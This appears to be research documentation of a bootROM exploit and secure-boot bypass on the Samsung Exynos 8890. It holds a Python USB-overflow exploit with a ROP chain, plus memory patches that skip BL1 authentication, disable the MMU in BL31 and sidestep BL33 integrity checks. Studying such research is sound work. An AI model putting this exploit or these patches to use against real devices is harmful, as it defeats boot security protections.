================== Exploit boot chain ================== This part describes the boot chain of the ``Exynos 8890`` SoC. .. important:: This is all still under development and will change. General overview ================ Memory layout ^^^^^^^^^^^^^ Keep this overview in mind when reading through the boot chain exploit. .. raw:: html Approach ^^^^^^^^ In our initial approach, we were manually booting all stages from the debugger, and jumping directly back to the debugger (without using the USB protocol). This was done to keep the debugger alive throughout the boot chain, but this became very difficult after BL31, as the MMU didn't allow us to read/write to most spaces, cutting off our access to BL31 during boot at some point. And losing our debugger interface in the process. This is also why there is some ghost code within the project. We were trying to keep the debugger alive throughout the boot chain, but this was not easily feasible. Boot stages ^^^^^^^^^^^^^^ Get the correct payloads for the bootROM stages from samsung firmware files, or from `Exynos8890 usbdl-recovery images/firmwares `_. .. list-table:: bootrom stages :header-rows: 1 * - File - Strings output - Likely boot stage? * - sboot.bin.1.bin - Exynos BL1 - BL1 * - sboot.bin.2.bin - BL31 %s - BL31 * - sboot.bin.3.bin - Unsure. Contains strings like: TOP_DIV_ACLK_MFC_600 and APOLLO_DIV_APOLLO_RUN_MONITOR - BL2? * - sboot.bin.4.bin - Contains more textual information, and references to post BL2 boot, and android information - Kernel boot/BL33? Gupje ^^^^^ .. note:: `Gupje `_ is the debugger we'll be loading onto the device and will be moving around throughout the bootchain. Gupje needs to be built and loaded onto the device. Throughout the exploit, we've been moving the debugger to different spaces in memory on the device. This was necessary as the space we initially used, was in the way of the space used for BL31 or BL2. After BL31, we lost access to the debugger, as BL2 was overwriting our last available space. At some point we moved the debugger to 0x11200000, as we saw that this space was used by BL31. Here below the most important arguments to build the debugger. This space is executable when the MMU is off. Here the ``linksript.txt`` file. .. code:: bash LINKSCRIPT.txt debugger_storage = 0x11201200; debugger_stack = 0x11201000; debugger_entry = 0x11200000; maybe_usb_setup_read = 0x00006f88; dwc3_ep0_start_trans = 0x0000791c; usb_event_handler = 0x00007bac; get_endpoint_recv_buffer = 0x00007a7c; exynos_sleep = 0x000027c8; g_recv_buffer = 0x11201600; g_data_received = 0x11201400; And the ``symbols.ld`` file. .. code:: bash SYMBOLS.ld MEMORY { ROM (rwx): ORIGIN = 0x11200000, LENGTH = 0x1000 } SECTIONS { . = 0x11200000; .text . : { *(.text*) *(.data*) *(.rodata*) } >ROM } Debuggers ========= After initial exploitation the goal was to fully boot the device. We're now moving into the next phase: 1) loading a debugger 2) and then to continue booting the device. If we manage to keep access to the debugger throughout the boot, this gives us room to exploit the device. But, the debugger needs to be kept 'alive' through the boot chain. The main difficulties here are the location of the debugger in memory (as it gets overwritten) and the MMU being enabled after BL31. Initial debugger ^^^^^^^^^^^^^^^^ The initial debugger is written to ``0x2069000``, with debugger_stack and _storage at ``0x0206b000`` and ``0x0206d000`` respectively. After the initial loading of the debugger, the processor state reported is (using ghidra assistant): .. code-block:: bash root | DEBUG | X0 : 0x0 | X1 : 0xffffffff | X2 : 0x20215d8 | X3 : 0x2021894 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 | X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 | X14 : 0xf | X15 : 0x206d000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x2000 | X20 : 0x2069000 | X21 : 0x0 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 | X28 : 0x0 | X29 : 0x2020f00 | LR/X30 : 0x20219b8 | SP/X31 : 0x2020ef0 LR/X30 being the line register. This is the address the processor will jump to when the function is done (important to keep track off). Second debugger ^^^^^^^^^^^^^^^ After a cache flush, the debugger seems to be cleared as well, so the debugger is relocated to ``0x20c0000``, with _stack and _storage now at ``0x20c2000`` and ``0x20c4000`` respectively. This is done by running: .. code-block:: python self.cd.arch_dbg.state.auto_sync = False self.cd.arch_dbg.state.auto_sync_special = False self.cd.arch_dbg.state.print_ctx() def relocate_debugger(): # Seems to be cleared upon cache clearing?? debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read() self.cd.memwrite_region(0x020c0000, debugger_reloc) self.usb_write(b"FLSH") # Flush cache self.cd.restore_stack_and_jump(0x020c0000) assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger" self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000) relocate_debugger() The processor state reported then is: .. code-block:: bash root | DEBUG | X0 : 0x0 | X1 : 0x1 | X2 : 0x20215d8 | X3 : 0x2021894 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 | X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 | X14 : 0xf | X15 : 0x20c4000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x2000 | X20 : 0x2069000 | X21 : 0x0 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 | X28 : 0x0 | X29 : 0x2020f00 | LR/X30 : 0x20c0000 | SP/X31 : 0x2020ef0 Final debugger ^^^^^^^^^^^^^^ We searched for quite some time for a space which was both writeable and executable. After BL31, most space became unreachable, with the MMU not allowing read/write at most spaces. We tried putting the debugger in the GPU cache, and tried some other spaces visible in the dtsi files, but eventually we found a space at ``0x11200000``. This space is executable when the MMU is off. With the MMU on, we can read/write but not execute here. Python part ^^^^^^^^^^^ Python code to setup the debugger. .. code-block:: python # Setup initial debugger self.setup_guppy_debugger() self.cd.arch_dbg.state.auto_sync = False self.cd.arch_dbg.state.auto_sync_special = False logger.debug('State after setting up initial debugger') self.cd.arch_dbg.state.print_ctx() DEBUGGER_ADDR = 0x2069000 # 0x2069000 # Relocate debugger debugger = open("../../dump/reloc_debugger_0x11200000.bin", "rb").read() self.relocate_debugger(debugger=debugger, entry=0x11200000, storage=0x11201200, g_data_received=0x11201400) DEBUGGER_ADDR = 0x11200000 # Test debugger connection self.cd.test_connection() Stage 1 - Initial exploit ========================= Frederic created a payload called 'Exynos8890dump_bootrom', which used the usb dwc3 protocol (USB Synopsys DesignWare USB 3.0), to read and dump the bootrom. This payload was slightly modified, to keep the USB connection alive (stage1.bin). Frederic's C code was implemented in python. .. code:: python def exploit(self, payload: bytes): ''' Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload. ''' assert len(payload) <= MAX_PAYLOAD_SIZE, "Shellcode too big" current_offset = TARGET_OFFSETS[self.target][0] xfer_buffer_start = TARGET_OFFSETS[self.target][1] # start of USB transfer buffer transferred = ctypes.c_int() size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 + 6 # max_uint32 - header(8) + data(n) + footer(2) #size_to_overflow = 0x100000000 - current_offset + xfer_buffer_start + 8 max_payload_size = 0x100000000 - size_to_overflow ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) # # Assert that payload is 502 bytes payload = payload + ((max_payload_size - len(payload)) * b"\x00") assert len(payload) == max_payload_size, "Invalid payload. Size is wrong" # First send payload to trigger the bug bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload)) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0) assert res == 0, "Error triggering payload" assert transferred.value == len(bug_payload), "Invalid transfered size" current_offset += len(bug_payload) - 8 # Remove header cnt = 0 while True: if current_offset + CHUNK_SIZE >= xfer_buffer_start and current_offset < xfer_buffer_start: break self.send_empty_transfer() current_offset += CHUNK_SIZE cnt += 1 if current_offset > 0x100000000: current_offset = current_offset - 0x100000000 #reset 32 byte integer print(f"{cnt} {hex(current_offset)}") remaining = (TARGET_OFFSETS[self.target][1] - current_offset) assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet" if remaining > BLOCK_SIZE: self.send_empty_transfer() # Send last transfer, TODO who aligns this ROM?? current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE) cnt += 1 print(f"{cnt} {hex(current_offset)}") # Build ROP chain. rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2) transferred = ctypes.c_int(0) res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0) assert res == 0, "Error sending ROP chain" return After this exploitation, we're able to send custom payloads. The first payload that is sent, sets up the debugger. In order to run the debugger, a small amount of the bootROM was reversed in order to implement send/recv functionality. @EljakimHerrewijnen: what send/recv did you reverse? What code from the bootROM did you reverse? Stage 2 - BL1 ============= Here, in order, the patches we applied to get BL1 to boot: .. figure:: images/boot_chain_bl1.drawio.svg :align: center Boot chain - Overwrite the USB return address pointer (`0x02020f60`) to jump back to the debugger. ``self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))`` - Set link register to debugger and jump into the boot USB (`0x000064e0`) function. ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR`` and then ``self.cd.restore_stack_and_jump(0x000064e0)`` - Now we can send the BL1 binary to the device. ``self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())``. At this point, we retain access to the debugger. - To patch the authentication, we set X0 and X1 to 1, then again set the link register to the debugger, and jump into the authentication function at ``0x00012848``. ``self.cd.arch_dbg.state.X0 = 1`` and ``self.cd.arch_dbg.state.X1 = 1`` and ``self.cd.arch_dbg.state.LR = lr`` and then ``self.cd.restore_stack_and_jump(0x00012848)`` - We flush the cache ``self.usb_write(b"FLSH")`` (Frederic did this as well). - Now we hijack the USB download function to jump back to the debugger. ``self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR))`` and ``self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))`` - And finally, we again restore our link register to the debugger, and jump into BL1 ``self.cd.restore_stack_and_jump(0x000002c0)`` .. figure:: images/initial_boot_function.png :align: center Overview of the initial boot function in the Exynos 8890. At this point, after loading and executing BL1, the device returns to the debugger. Normally, the device would boot into BL1, and would then wait for the next boot stage to be sent over USB. But because we hijacked the USB return address pointer, the device returns to the debugger. Regarding auth_bl1: Initially we thought that 0x0 indicated a verified boot state (as is plausible when reading the decompiled code in Ghidra). But after modifying BL1 in the header and contents, this value did not change. .. note:: git commit 8cb5f2e1 fully boots, you can use this commit to patch BL1 only. Stage 3 - BL31 ============== Initial boot through BL31 ^^^^^^^^^^^^^^^^^^^^^^^^^ Next up is BL31, which is loaded by BL1. BL31 is written at ``0x02024000`` with the entry point at ``0x02024010``, it ends at ``0x02048000``. ``BL31`` is the secure monitor. The monitor uses memory that is also being used by the debugger, so we will have to relocate it to keep code exeuction. .. figure:: images/bl31_debugger_memory_example.png :align: center Example of BL31 using memory from the initial debugger. BL31 also configures the VBAR_EL3 and MMU so the memory mapping will probably change after this stage (preparation for trustzone?). Here we decided to move the debugger to 0x02048000, as this space is still accessible after BL31, but this space will get overwritten by BL2. At this point we switched our approach to booting the device, as we were unable to keep the debugger alive throughout the boot chain. We now boot the device normally, and then try to get our debugger after booting each stage. Because of this, we didn't need to modify a lot after BL1. Essentially all we did was: - Set the link register to the debugger: ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR`` - Jump into our hijacked USB function: ``self.cd.restore_stack_and_jump(hijacked_fun)`` - Send BL31: ``self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())`` - Continue a function that BL1 called via the USB: ``self.cd.restore_stack_and_jump(0x2022948)`` - Jump into BL31: ``self.cd.restore_stack_and_jump(0x02024010)`` This boot process restores us to the debugger, but after this, we're unable to access most memory spaces. Notably, we tried getting access to the TTBR0_EL3. But something prohibits us reading there. We weren't able to find any executable space that was still available, for after BL2. BL2 would overwrite our debugger at this point. Patching BL31 ^^^^^^^^^^^^^ While looking for flags which were used for the MMU, we found a function at ``0x020244e8`` which we were able to turn off, but which still allowed a full boot into recovery. The MMU however stated to being disabled. - get special registers: ``self.cd.arch_dbg.fetch_special_regs()`` - MMU state: ``self.cd.arch_dbg.state.R_SCTLR_EL3.mmu`` .. figure:: images/turn_off_MMU_but_good_boot_0x020244e8.png :align: center Function patheable that turns off MMU, but keeps boot intact. Additionally we found a space at ``0x11207010``, while looking for bit flags in ghidra, which seemed to be a memory read/write space. This space was not executable, unless the MMU was turned off. We used this space to store our debugger, then before booting BL31, we patched the if-statement above to disable the MMU. And booted. - Patch if-statement to not be met: ``self.cd.memwrite_region(0x020244e8, struct.pack('>I', 0x1f0c00f1))`` - Jump into BL31: ``self.cd.restore_stack_and_jump(0x02024010)`` Stage 4 - BL2 ============= This is our current progress. BL2 has booted, and shows the VBAR's for EL1. .. code:: bash MMU is 0x0 (0x1=enabled, 0x0=disabled) TTBR0_EL3: 0xbc4650892f1460, TTBR1_EL2: 0xc54d39cb66f0, TTBR0_EL1: 0xa5c20fc0ac581142 VBAR_EL3: 0x2031800, VBAR_EL2: 0x0, VBAR_EL1: 0x2053800 TCR_EL3: 0x0, TCR_EL2: 0x80800000, TCR_EL1: 0x0 SCTLR_EL3: 0xc5183a, SCTLR_EL2: 0x30c5083a, SCTLR_EL1: 0x30c5083a MAIR_EL3: 0x44e048e000098aa4, MAIR_EL2: 0x1e42bb572931240b, MAIR_EL1: 0x44e048e000098aa4 Current EL: 0xc Stage 5 - BL33 ============== The last stage before the kernel boots. .. figure:: images/bl31_debugger_memory_example.png :align: center Boot chain with EL3 and EL1 areas To keep access to the debugger, but allow modifications, we need to again load the BL33, but not boot it. We need to set some registers to accomplish this. We continue our bootflow to allow the device to load BL33, and then after it is done loading, let it jump back to the debugger: - Store BL33 address in X0: ``self.cd.arch_dbg.state.X0 = BL33_ptr`` - Store BL33 link register in LR: ``self.cd.arch_dbg.state.LR = BL33_LR`` - Set LR to debugger: ``self.cd.arch_dbg.state.LR = DEBUGGER_ADDR`` - Jump into the function that loads BL33: ``self.cd.restore_stack_and_jump(hijacked_fun)`` Now we can again load our next boot stage (BL33), send it, and verify a return to the debugger. At this point, we tried patching something in memory at BL33 - like we did at BL31. But this always failed. After consultation, it seemed most likely that something was checking the integrity of the next boot stages. When we modified and reverted our changes, the boot was proper. The link register to continue our boot flow was at ``0x2024eec``. We did not succeed to manually do a verification, and continue the boot flow. This function at 0x2024eec does also not return, but instead continues onwards. .. figure:: images/_integrity_check_BL2-BL33.png :align: center Possible integrity check of boot stages at BL2 and BL33. The decompilation is a bit broken, but we noticed that there are multiple calls to the same function, not just at the location where BL33 was returning from. With most specific things related to BL33 already done before this function. A similar verification seemed to have been done at ``0x02024e5c``. At this address, the same function was executed as at ``0x02024eec``, so instead of jumpingo into the function at ``0x02024eec``, we jumped into the function at ``0x02024e5c``. This worked, and allowed us to patch BL33, while continuing our boot flow. I assume, that we're doing an integrity check over BL2, while booting BL33.